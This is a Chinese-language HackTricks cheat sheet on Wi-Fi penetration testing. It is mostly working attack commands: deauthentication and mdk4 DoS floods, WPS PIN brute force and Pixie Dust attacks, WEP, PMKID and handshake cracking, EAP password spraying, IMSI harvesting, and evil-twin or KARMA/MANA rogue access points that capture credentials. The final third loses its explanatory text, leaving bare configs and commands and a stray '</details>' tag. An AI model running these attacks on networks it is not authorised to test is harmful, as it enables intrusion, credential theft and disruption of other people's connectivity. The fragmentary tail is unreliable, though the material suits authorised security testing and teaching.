Pentesting Wifi

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

• 查看 订阅计划!
• 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
• 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

Wifi 基本命令

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

工具

Hijacker & NexMon (Android 内部 Wi-Fi)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

使用 docker 运行 airgeddon

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

From: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

它可以执行 Evil Twin、KARMA 和 Known Beacons 攻击，然后使用 phishing template 来设法获取网络的真实密码或捕获社交网络凭证。

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

该工具自动化执行 WPS/WEP/WPA-PSK 攻击。它会自动：

• 将接口设置为 monitor mode
• 扫描可能的网络 - 并让你选择受害者
• 如果是 WEP - 发起 WEP 攻击
• 如果是 WPA-PSK
• 如果是 WPS: Pixie dust attack 和 bruteforce attack（注意 bruteforce attack 可能需要很长时间）。注意它不会尝试 null PIN 或 database/generated PINs。
• 尝试从 AP 捕获 PMKID 以便破解
• 尝试 deauthenticate AP 的客户端以捕获 handshake
• 如果有 PMKID 或 Handshake，尝试使用 top5000 passwords 进行 bruteforce。

Attacks Summary

• DoS
• Deauthentication/disassociation – 断开所有人（或特定的 ESSID/Client）
• Random fake APs – 隐藏网络，可能导致扫描器崩溃
• Overload AP – 尝试 kill AP（通常不是很有用）
• WIDS – 玩弄 IDS
• TKIP, EAPOL – 对某些 AP 的特定 DoS 攻击
• Cracking
• Crack WEP（多个工具和方法）
• WPA-PSK
• WPS pin “Brute-Force”
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin（有或没有 DoS）
• Open Evil Twin [+ DoS] – 有助于捕获 captive portal creds 和/或 执行 LAN 攻击
• WPA-PSK Evil Twin – 如果知道密码，对网络攻击很有用
• WPA-MGT – 有助于捕获公司 credentials
• KARMA, MANA, Loud MANA, Known beacon
• + Open – 有助于捕获 captive portal creds 和/或 执行 LAN 攻击
• + WPA – 有助于捕获 WPA handshakes

Open / OWE networks quick notes

• Passive capture on open SSIDs 仍然可以通过 monitor mode 和 tcpdump 工作：

iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap

• OWE (Opportunistic Wireless Encryption) 对每个终端执行密钥交换（无 PSK），因此即使在 “open” SSIDs 上，空中帧也会被加密。作为基于 WPA3 的技术，它还强制实施 802.11w PMF，可以阻止伪造的 deauth/disassoc 帧。
• OWE does not authenticate joiners：任何人都可以关联，因此应 verify client isolation，不要只相信营销宣传。若没有隔离，本地 L2 上的 ARP spoofing 或 responder-style poisoning 仍然有效。
• Evil Twin 通过提供更强的信号仍能在 open/OWE SSIDs 上实现；PMF 只是去掉了 deauth 的捷径。如果受害者接受伪造的 TLS cert，就可以恢复完整的 HTTP(S) MitM。
• 在 open guest Wi-Fi 上进行 Broadcast poisoning 容易获取 creds/hashes（LLMNR/NBT-NS/mDNS）。参见：

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

DOS

Deauthentication Packets

描述来自 here:。

Deauthentication 攻击是 Wi-Fi hacking 中一种常见手法，涉及伪造 “management” 帧以 强制将设备从网络中断开。这些未加密的数据包会欺骗客户端，使其误以为来自合法网络，从而使攻击者能够收集 WPA handshakes 以便进行 cracking，或持续扰乱网络连接。这种策略因其简单而令人警惕，被广泛使用，对网络安全有重大影响。

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 表示 deauthentication
• 1 是要发送的 deauths 数量（如需可发送多个）；0 表示持续发送
• -a 00:14:6C:7E:40:80 是 access point 的 MAC address
• -c 00:0F:B5:34:30:30 是要 deauthenticate 的 client 的 MAC address；如果省略则发送 broadcast deauthentication（不总是有效）
• ath0 是 interface name

Disassociation Packets

Disassociation packets, 类似于 deauthentication packets，是 Wi-Fi 网络中使用的一种 management frame。它们用于断开 device（例如 laptop 或 smartphone）与 access point (AP) 之间的连接。disassociation 和 deauthentication 之间的主要区别在于使用场景。AP 会发出 deauthentication packets to remove rogue devices explicitly from the network, disassociation packets are typically sent when the AP is undergoing a shutdown；在 AP 关闭、重启或迁移时，通常会发送 disassociation packets，从而断开所有已连接的节点。

此攻击可通过 mdk4(mode “d”) 执行：

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

更多由 mdk4 发起的 DOS 攻击

在 here.

ATTACK MODE b: Beacon Flooding

向客户端发送 beacon frames 用于显示 fake APs。这有时会使 network scanners 甚至 drivers 崩溃！

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

发送认证帧到所有覆盖范围内可访问的接入点（APs）可能会使这些 APs 过载，尤其是在有大量客户端时。大量流量会导致系统不稳定，造成部分 APs 冻结甚至重启。

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

探测 Access Points (APs) 可以检查 SSID 是否正确显示并确认 AP 的覆盖范围。该技术结合 bruteforcing hidden SSIDs（有或没有 wordlist），有助于识别并访问隐藏网络。

ATTACK MODE m: Michael Countermeasures Exploitation

向不同的 QoS queues 发送随机或重复的数据包可能在 TKIP APs 上触发 Michael Countermeasures，导致 AP 关闭一分钟。该方法是一种高效的 DoS（Denial of Service）攻击手段。

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

向 AP 泛洪 EAPOL Start frames 会创建 fake sessions，使 AP 不堪重负并阻止合法客户端。或者，注入 fake EAPOL Logoff messages 强制断开客户端连接，这两种方法都能有效中断网络服务。

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: 针对 IEEE 802.11s 网状网络的攻击

对网状网络中的链路管理和路由的各种攻击。

ATTACK MODE w: WIDS 混淆

将客户端交叉连接到多个 WDS 节点或伪造的 rogue APs，可以操纵 Intrusion Detection and Prevention Systems，制造混淆并可能导致系统被滥用。

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

一个具有多种数据包来源和用于数据包操作的全面修饰器集合的 Packet Fuzzer。

Airggedon

Airgeddon 提供了前述评论中提出的大多数攻击：

WPS

WPS (Wi-Fi Protected Setup) 简化了将设备连接到路由器的过程，加快并简化了对使用 WPA 或 WPA2 Personal 加密的网络的设置。对于容易被攻破的 WEP，WPS 无效。WPS 使用 8 位 PIN，分两部分进行验证，由于组合数有限（约 11,000 种可能），因此容易受到暴力破解攻击。

WPS Bruteforce

执行此操作主要有两个工具：Reaver 和 Bully。

• Reaver 旨在成为针对 WPS 的稳健且实用的攻击工具，并已在多种接入点和 WPS 实现上进行过测试。
• Bully 是用 C 编写的 WPS 暴力破解攻击的一个 新实现。与原始 reaver 代码相比，它有若干优点：依赖更少、内存和 CPU 性能更好、正确处理 endianness（字节序），并提供更健壮的选项集。

该攻击利用了 WPS PIN 的脆弱性，特别是它会暴露前四位数字且最后一位作为校验和的机制，从而简化了暴力破解过程。然而，对抗暴力破解的防护措施（例如阻止激进攻击者的 MAC address）要求进行 MAC address rotation 才能继续攻击。

在使用 Bully 或 Reaver 等工具获得 WPS PIN 后，攻击者可以推算出 WPA/WPA2 PSK，从而确保 持续的网络访问。

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

这种改进的方法利用已知漏洞针对 WPS PINs：

1. Pre-discovered PINs: 使用一个已知 PIN 数据库，该数据库将已知使用统一 WPS PINs 的特定制造商与 PIN 关联。该数据库将 MAC-addresses 的前三个八位组与这些制造商可能的 PIN 进行对应。
2. PIN Generation Algorithms: 利用像 ComputePIN 和 EasyBox 这样的算法，这些算法基于 AP 的 MAC-address 计算 WPS PINs。Arcadyan algorithm 还需要一个 device ID，为 PIN 生成过程增加了一层。

WPS Pixie Dust attack

Dominique Bongard 发现了一些 Access Points (APs) 在创建名为 nonces (E-S1 和 E-S2) 的秘密码时存在一个缺陷。如果这些 nonces 能被推算出来，破解 AP 的 WPS PIN 就变得很容易。AP 在一个特殊的代码（hash）中暴露了 PIN 以证明它是合法的而不是伪造（rogue）AP。这些 nonces 本质上就是打开保存 WPS PIN 的“保险箱”的“钥匙”。更多内容见 here.

简单来说，问题在于一些 AP 在连接过程中用于加密 PIN 的密钥随机性不足。这使得 PIN 易于被网络外部猜测（offline brute force attack）。

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

如果你不想把设备切换到 monitor mode，或者 reaver 和 bully 出现问题，可以尝试 OneShot-C。该工具可以在无需切换到 monitor mode 的情况下执行 Pixie Dust attack。

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

一些设计不良的系统甚至允许 Null PIN（一个空的或不存在的 PIN）授予访问权限，这相当不寻常。工具 Reaver 能够测试此漏洞，而 Bully 则不能。

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

所有提出的 WPS 攻击都可以使用 airgeddon. 轻松执行

• 5 和 6 让你尝试 自定义 PIN（如果你有的话）
• 7 和 8 执行 Pixie Dust attack
• 13 允许你测试 NULL PIN
• 11 和 12 会从可用数据库重新收集与选定 AP 相关的 PINs并生成可能的PINs，使用：ComputePIN、EasyBox，和可选的 Arcadyan（推荐，何乐而不为？）
• 9 和 10 将测试 所有可能的 PIN

WEP

Why it collapses

• RC4 seed 只是 IV (24 bits) + shared key。IV 是明文、很小（2^24），并且很快重复，所以具有相同 IV 的密文会重用 keystream。
• 对两个使用相同 keystream 的密文进行 XOR leaks PlaintextA ⊕ PlaintextB；可预测的报头 + RC4 KSA 偏差（FMS）让你对密钥字节进行“投票”。PTW 使用 ARP 流量优化这一点，将所需的数据包从数百万降到数万。
• 完整性仅为 CRC32（线性/无密钥），因此攻击者可以翻转比特并在不需要密钥的情况下重新计算 CRC32 → 在等待 IV 的同时进行数据包伪造/重放/ARP 注入。

实际破解是确定性的：

airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met

Airgeddon 仍然附带一个 “All-in-One” WEP 工作流，如果你更喜欢引导式 UI。

WPA/WPA2 PSK

PMKID

2018 年，hashcat 披露了一种新的攻击方法，其独特之处在于它只需单个数据包，且不需要任何客户端连接到目标 AP——只需攻击者与 AP 之间的交互。

许多现代路由器在关联期间向第一个 EAPOL 帧添加了一个可选字段，称为 Robust Security Network。这其中包含了 PMKID。

正如原帖所说明，PMKID 是使用已知数据创建的：

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

鉴于 “PMK Name” 是恒定的，我们知道 AP 的 BSSID 和 station，且 PMK 与完整 4-way handshake 中的一致，hashcat 可以使用这些信息破解 PSK 并恢复 passphrase！

要 gather 这些信息并在本地 bruteforce 密码你可以执行：

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

PMKIDs captured 将显示在 console 中，并且也会 保存 在 _ /tmp/attack.pcap_.
现在，将 capture 转换为 hashcat/john 格式并 crack it:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

请注意，正确的 hash 格式包含 4 个部分，例如：4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838。如果你的 仅 包含 3 个部分，那么它是 无效的（PMKID capture 无效）。

注意，hcxdumptool also capture handshakes（会出现类似：MP:M1M2 RC:63258 EAPOLTIME:17091）。你可以 transform 这些 handshakes 为 hashcat/john 格式，使用 cap2hccapx。

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

I have noticed that some handshakes captured with this tool couldn’t be cracked even knowing the correct password. I would recommend to capture handshakes also via traditional way if possible, or capture several of them using this tool.

Handshake 捕获

对 WPA/WPA2 网络的攻击可以通过捕获 handshake 并尝试在 offline 环境下 crack 密码来执行。该过程涉及在特定 channel 上监视特定网络与 BSSID 的通信。下面是精简指南：

1. 确认目标网络的 BSSID、channel 和一个 connected client。
2. 使用 airodump-ng 在指定的 channel 和 BSSID 上监视网络流量，尝试捕获 handshake。命令如下：

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. 为了增加捕获 handshake 的机会，可以短暂断开客户端与网络的连接以强制重新认证。可以使用 aireplay-ng 命令来实现，该命令向客户端发送 deauthentication packets：

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Note that as the client was deauthenticated it could try to connect to a different AP or, in other cases, to a different network.

一旦在 airodump-ng 中出现一些 handshake 信息，这表示已捕获 handshake，你可以停止监听：

一旦捕获到 handshake，你可以使用 aircrack-ng crack 它：

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

检查文件中是否有 handshake

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

如果该工具在找到已完成的握手之前先发现某个 ESSID 的未完成握手，它不会检测到有效的握手。

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

通过 wpa_supplicant ctrl socket 更快进行在线 PSK 猜测（无 clients/PMKID）

当没有客户端且 AP 拒绝 PMKID 时，你可以在线迭代 PSKs，而无需重启 supplicants：

• 修改 wpa_supplicant.c，在认证失败的退避逻辑中（位于 ssid->auth_failures 附近）强制设定 dur = 0;，从而有效禁用临时禁用计时器。
• 使用带控制套接字的单个守护进程运行：

# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf

• 通过控制界面驱动它，重用相同的 scan 和 network：

ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED

一个小的 Python 循环读取 socket 事件 (CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED) 可以在没有扫描开销的情况下在大约 5 分钟内测试约 100 个猜测。它仍然会产生噪声且易被检测，但可以避免每次尝试时重启进程和退避延迟。

WPA Enterprise (MGT)

在 enterprise WiFi 部署中，您会遇到各种认证方法，每种方法提供不同的安全级别和管理功能。使用像 airodump-ng 这样的工具检查网络流量时，您可能会注意到这些认证类型的标识符。一些常见的方法包括：

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• 该方法在 EAP-PEAP 中支持硬件令牌和一次性密码。与 MSCHAPv2 不同，它不使用 peer challenge，并以明文将密码发送到接入点，这对降级攻击构成风险。

2. EAP-MD5 (Message Digest 5):

• 客户端发送密码的 MD5 哈希。由于容易遭受字典攻击、缺乏服务器认证且无法生成会话特定的 WEP 密钥，不推荐 使用。

3. EAP-TLS (Transport Layer Security):

• 使用客户端和服务器端证书进行认证，并能动态生成基于用户和基于会话的 WEP 密钥以保护通信。

4. EAP-TTLS (Tunneled Transport Layer Security):

• 通过加密隧道提供双向认证，并提供派生动态的、每用户每会话的 WEP 密钥的方法。仅需要服务器端证书，客户端使用凭证。

5. PEAP (Protected Extensible Authentication Protocol):

• 像 EAP 一样通过创建 TLS 隧道来保护通信。隧道提供的保护允许在 EAP 之上使用较弱的认证协议。
• PEAP-MSCHAPv2：通常简称为 PEAP，将易受攻击的 MSCHAPv2 挑战/响应机制与保护性的 TLS 隧道结合。
• PEAP-EAP-TLS (or PEAP-TLS)：与 EAP-TLS 类似，但在交换证书之前先建立 TLS 隧道，提供额外的安全层。

You can find more information about these authentication methods here and here.

Username Capture

阅读 https://tools.ietf.org/html/rfc3748#page-27 后，看来如果使用 EAP，“Identity” messages 必须被支持，并且 username 会在 “Response Identity” 消息中以明文发送。

即便使用最安全的认证方法之一：PEAP-EAP-TLS，仍然可能capture the username sent in the EAP protocol。为此，capture a authentication communication（在一个信道中启动 airodump-ng，并在同一接口中运行 wireshark），并按 eapol 过滤数据包。
在 “Response, Identity” 包中，客户端的 username 将出现。

Anonymous Identities

EAP-PEAP 和 EAP-TTLS 都支持身份隐藏。在 WiFi 网络的上下文中，EAP-Identity 请求通常由接入点 (AP) 在关联过程中发起。为了保护用户匿名性，用户设备上 EAP 客户端的响应只包含初始 RADIUS 服务器处理请求所需的基本信息。以下情景说明了这一概念：

• EAP-Identity = anonymous
• 在这种情形下，所有用户都使用匿名的 pseudonymous “anonymous” 作为其用户标识。初始 RADIUS 服务器充当 EAP-PEAP 或 EAP-TTLS 服务器，负责管理 PEAP 或 TTLS 协议的服务器端。然后，内部（受保护的）认证方法要么在本地处理，要么委派给远程（home）RADIUS 服务器。
• EAP-Identity = anonymous@realm_x
• 在这种情况下，不同 realm 的用户在隐藏其身份的同时指示各自的 realm。这允许初始 RADIUS 服务器将 EAP-PEAP 或 EAP-TTLS 请求代理到其 home realm 中的 RADIUS 服务器，这些服务器充当 PEAP 或 TTLS 服务器。初始 RADIUS 服务器仅作为 RADIUS 中继节点运行。
• 或者，初始 RADIUS 服务器可作为 EAP-PEAP 或 EAP-TTLS 服务器，并要么处理受保护的认证方法，要么将其转发到另一台服务器。此选项便于为不同的 realms 配置不同的策略。

在 EAP-PEAP 中，一旦在 PEAP 服务器和 PEAP 客户端之间建立了 TLS 隧道，PEAP 服务器会发起 EAP-Identity 请求并通过 TLS 隧道传输。客户端通过加密隧道响应第二个 EAP-Identity 请求，发送包含用户真实身份的 EAP-Identity 响应。此方法有效防止任何窃听 802.11 流量的人看到用户的真实身份。

EAP-TTLS 的过程略有不同。在 EAP-TTLS 中，客户端通常在 TLS 隧道保护下使用 PAP 或 CHAP 进行认证。在这种情况下，客户端在隧道建立后发送的初始 TLS 消息中包含一个 User-Name 属性以及 Password 或 CHAP-Password 属性。

无论选择哪种协议，PEAP/TTLS 服务器在 TLS 隧道建立后都会获取用户的真实身份。真实身份可以表示为 user@realm 或简单的 user。如果 PEAP/TTLS 服务器也负责对用户进行认证，它现在掌握了用户身份并继续使用 TLS 隧道保护的认证方法。或者，PEAP/TTLS 服务器可将新的 RADIUS 请求转发到用户的 home RADIUS 服务器。这个新的 RADIUS 请求省略了 PEAP 或 TTLS 协议层。在受保护的认证方法为 EAP 的情况下，内部 EAP 消息会在没有 EAP-PEAP 或 EAP-TTLS 包装的情况下传输到 home RADIUS 服务器。传出的 RADIUS 消息的 User-Name 属性包含用户的真实身份，替换了传入 RADIUS 请求中的匿名 User-Name。当受保护的认证方法为 PAP 或 CHAP（仅由 TTLS 支持）时，从 TLS 有效载荷中提取的 User-Name 和其他认证属性将被替换进传出的 RADIUS 消息，从而取代传入 RADIUS 请求中的匿名 User-Name 和 TTLS EAP-Message 属性。

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.

Where the leak happens (high level):

• 802.11 association completes to the SSID（通常是运营商卸载 SSID，如 FreeWifi_secure、类似 eduroam 的 operator realms 等）。
• Authenticator sends EAP-Request/Identity。
• Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection。
• Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• Anyone passively listening to RF can read that frame。No 4-way handshake or TLS keying is needed。

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

</details>

注意：
- 如果部署使用裸 EAP‑SIM/AKA 且未启用 protected identity/pseudonyms（受保护的身份/假名），则在任何 TLS 隧道建立之前就会发生。
- 暴露的值是与订户的 SIM 绑定的永久标识；收集该值可实现长期追踪并导致后续的电信滥用。

影响
- 隐私：在公共场所通过被动 Wi‑Fi 捕获实现对用户/设备的持续跟踪。
- 电信滥用引导：获得 IMSI 后，拥有 SS7/Diameter 访问的攻击者可以查询位置，或尝试拦截通话/SMS 并窃取 MFA。

缓解 / 检查要点
- 验证客户端是否按照 3GPP 指南（例如 3GPP TS 33.402）为 EAP‑SIM/AKA 使用匿名外层身份（anonymous outer identities / pseudonyms）。
- 优先对身份阶段进行隧道化（例如通过 EAP‑TTLS/PEAP 承载内层 EAP‑SIM/AKA），以避免以明文发送 IMSI。
- association/auth 的抓包不应在 EAP-Response/Identity 中暴露原始 IMSI。

相关：使用捕获的移动标识符进行电信信令利用
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

如果客户端预计使用 **用户名和密码**（注意 **EAP-TLS 在这种情况下无效**），那么你可以尝试获取一份 **用户名** 列表（见下一部分）和 **密码**，并尝试对访问进行 **bruteforce**，使用 [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

apt-get install dnsmasq #Manages DHCP and DNS

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf -d

apt-get install hostapd

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

--negotiate weakest

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5